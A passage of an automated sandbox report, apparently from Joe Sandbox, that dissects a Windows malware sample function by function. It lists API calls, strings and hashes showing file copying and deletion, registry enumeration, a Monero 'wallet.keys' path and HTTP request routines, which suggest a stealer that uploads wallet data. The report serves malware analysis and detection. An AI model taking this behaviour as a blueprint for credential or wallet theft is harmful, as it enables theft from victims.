stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0077AA70: StrCmpCA.SHLWAPI(01259218,0076A7A7,?,0076A7A7,01259218), ref: 0077AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0076AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0076AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0076ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0076A8B0

Part of subcall function 0077A820: lstrlen.KERNEL32(00764F05,?,?,00764F05,00780DDE), ref: 0077A82B
Part of subcall function 0077A820: lstrcpy.KERNEL32(00780DDE,00000000), ref: 0077A885

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

lstrcat.KERNEL32(?,00000000), ref: 0076ACEB
lstrcat.KERNEL32(?,00781320), ref: 0076ACFA
lstrcat.KERNEL32(?,00000000), ref: 0076AD0D
lstrcat.KERNEL32(?,00781324), ref: 0076AD1C
lstrcat.KERNEL32(?,00000000), ref: 0076AD2F
lstrcat.KERNEL32(?,00781328), ref: 0076AD3E
lstrcat.KERNEL32(?,00000000), ref: 0076AD51
lstrcat.KERNEL32(?,0078132C), ref: 0076AD60
lstrcat.KERNEL32(?,00000000), ref: 0076AD73
lstrcat.KERNEL32(?,00781330), ref: 0076AD82
lstrcat.KERNEL32(?,00000000), ref: 0076AD95
lstrcat.KERNEL32(?,00781334), ref: 0076ADA4
lstrcat.KERNEL32(?,00000000), ref: 0076ADB7
lstrlen.KERNEL32(?), ref: 0076AE0D
lstrlen.KERNEL32(?), ref: 0076AE1C

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

DeleteFileA.KERNEL32(00000000), ref: 0076AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0076ABD4

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: e288f3b925af469625bd45a7329c5d76d05de37695dd72cb63b33b3e5d50e89e
Instruction ID: 43bd6385732b2ea87008c40c627ffc016df8073015e21fa2158169960ab01203
Opcode Fuzzy Hash: e288f3b925af469625bd45a7329c5d76d05de37695dd72cb63b33b3e5d50e89e
Instruction Fuzzy Hash: E5120F71910108EBEF05FBA0DD9ADEE7378AF54341F508168B51BA6091DF386E09DBA3

Function 00765960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00764839
Part of subcall function 007647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00764849

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007659F8
StrCmpCA.SHLWAPI(?,0125E978), ref: 00765A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00765B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0125E9D8,00000000,?,0125AA70,00000000,?,00781A1C), ref: 00765E71
lstrlen.KERNEL32(00000000), ref: 00765E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00765E93
RtlAllocateHeap.NTDLL(00000000), ref: 00765E9A
lstrlen.KERNEL32(00000000), ref: 00765EAF
lstrlen.KERNEL32(00000000), ref: 00765ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00765EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00765F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00765F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00765F4C
InternetCloseHandle.WININET(00000000), ref: 00765FB0
InternetCloseHandle.WININET(00000000), ref: 00765FBD
HttpOpenRequestA.WININET(00000000,0125EAC8,?,0125E230,00000000,00000000,00400100,00000000), ref: 00765BF8

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

InternetCloseHandle.WININET(00000000), ref: 00765FC7

Strings

------, xrefs: 00765C0B
------, xrefs: 00765D4C
------, xrefs: 00765A96
", xrefs: 00765E16
", xrefs: 00765CD5

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: d9c1020991a1397685d426706dcef1695d51489b224a2ecfda4ed534df11f144
Instruction ID: 04b0ffecd9398b234768676d01b6ebf724e826302ba5096f3759aac6e73b86aa
Opcode Fuzzy Hash: d9c1020991a1397685d426706dcef1695d51489b224a2ecfda4ed534df11f144
Instruction Fuzzy Hash: D312F171820118FBEF15EBA0DC99FEE7378BF54740F508169B11A62091DF782A49CFA6

Function 0076CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 00778B60: GetSystemTime.KERNEL32(00780E1A,0125AB00,007805AE,?,?,007613F9,?,0000001A,00780E1A,00000000,?,01259048,?,\Monero\wallet.keys,00780E17), ref: 00778B86

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0076CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0076D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0076D0CE
lstrcat.KERNEL32(?,00000000), ref: 0076D208
lstrcat.KERNEL32(?,00781478), ref: 0076D217
lstrcat.KERNEL32(?,00000000), ref: 0076D22A
lstrcat.KERNEL32(?,0078147C), ref: 0076D239
lstrcat.KERNEL32(?,00000000), ref: 0076D24C
lstrcat.KERNEL32(?,00781480), ref: 0076D25B
lstrcat.KERNEL32(?,00000000), ref: 0076D26E
lstrcat.KERNEL32(?,00781484), ref: 0076D27D
lstrcat.KERNEL32(?,00000000), ref: 0076D290
lstrcat.KERNEL32(?,00781488), ref: 0076D29F
lstrcat.KERNEL32(?,00000000), ref: 0076D2B2
lstrcat.KERNEL32(?,0078148C), ref: 0076D2C1
lstrcat.KERNEL32(?,00000000), ref: 0076D2D4
lstrcat.KERNEL32(?,00781490), ref: 0076D2E3

Part of subcall function 0077A820: lstrlen.KERNEL32(00764F05,?,?,00764F05,00780DDE), ref: 0077A82B
Part of subcall function 0077A820: lstrcpy.KERNEL32(00780DDE,00000000), ref: 0077A885

lstrlen.KERNEL32(?), ref: 0076D32A
lstrlen.KERNEL32(?), ref: 0076D339

Part of subcall function 0077AA70: StrCmpCA.SHLWAPI(01259218,0076A7A7,?,0076A7A7,01259218), ref: 0077AA8F

DeleteFileA.KERNEL32(00000000), ref: 0076D3B4

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 31e76c82f1b77f43b3b1e966a70d55e86f2935945f255ccf015d82e2fb5835d3
Instruction ID: 69e9a19722347c6bb935587857e346d2448baff885fbc470d2a2d68a44d6c217
Opcode Fuzzy Hash: 31e76c82f1b77f43b3b1e966a70d55e86f2935945f255ccf015d82e2fb5835d3
Instruction Fuzzy Hash: F4E13F71910108EBDF05FBA0DD9AEEE7378AF54341F108168F50BA6091DF39AE05DBA2

Function 00764880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00764839
Part of subcall function 007647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00764849

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00764915
StrCmpCA.SHLWAPI(?,0125E978), ref: 0076493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00764ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00780DDB,00000000,?,?,00000000,?,",00000000,?,0125EA38), ref: 00764DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00764E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00764E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00764E49
InternetCloseHandle.WININET(00000000), ref: 00764EAD
InternetCloseHandle.WININET(00000000), ref: 00764EC5
HttpOpenRequestA.WININET(00000000,0125EAC8,?,0125E230,00000000,00000000,00400100,00000000), ref: 00764B15

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

InternetCloseHandle.WININET(00000000), ref: 00764ECF

Strings

", xrefs: 00764D33
------, xrefs: 00764C69
------, xrefs: 00764B28
", xrefs: 00764BF2
------, xrefs: 007649BD

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 70fb3b802091f048bbe4cb9d0e3e7719a1b892976f58ae967621c75ace0f1a40
Instruction ID: 01a17795b61c40b97e647e32609f73ff2d56cf307446b9c2809274ea4990dd40
Opcode Fuzzy Hash: 70fb3b802091f048bbe4cb9d0e3e7719a1b892976f58ae967621c75ace0f1a40
Instruction Fuzzy Hash: A212DF71910118EAEF15EB60DC5AFEEB378AF55340F5081A9B11A62091DF782F49CFA2

Function 00778320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

RegOpenKeyExA.KERNEL32(00000000,0125B498,00000000,00020019,00000000,007805B6), ref: 007783A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00778426
wsprintfA.USER32 ref: 00778459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0077847B
RegCloseKey.ADVAPI32(00000000), ref: 0077848C
RegCloseKey.ADVAPI32(00000000), ref: 00778499

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Strings

%s\%s, xrefs: 0077844D
- , xrefs: 007785A3
?, xrefs: 0077837A

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: d87b5d507ea9434c8a4832db91cc11612b47ee33b7013d3dc03a698fe2a60ba0
Instruction ID: 257c1aa593fde729e0f2a22597273050308b435fa9a75472e0b5671c9f55f707
Opcode Fuzzy Hash: d87b5d507ea9434c8a4832db91cc11612b47ee33b7013d3dc03a698fe2a60ba0
Instruction Fuzzy Hash: 4D810BB1950118ABEB65DB64CC95FEE77B8BF48740F00C298E109A6140DF796B89CFE1

Function 00766280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00764839
Part of subcall function 007647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00764849

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

InternetOpenA.WININET(00780DFE,00000001,00000000,00000000,00000000), ref: 007662E1
StrCmpCA.SHLWAPI(?,0125E978), ref: 00766303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00766335
HttpOpenRequestA.WININET(00000000,GET,?,0125E230,00000000,00000000,00400100,00000000), ref: 00766385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007663BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007663D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007663FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0076646D
InternetCloseHandle.WININET(00000000), ref: 007664EF
InternetCloseHandle.WININET(00000000), ref: 007664F9
InternetCloseHandle.WININET(00000000), ref: 00766503

Strings

ERROR, xrefs: 007664C9
ERROR, xrefs: 00766407
GET, xrefs: 0076637C

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
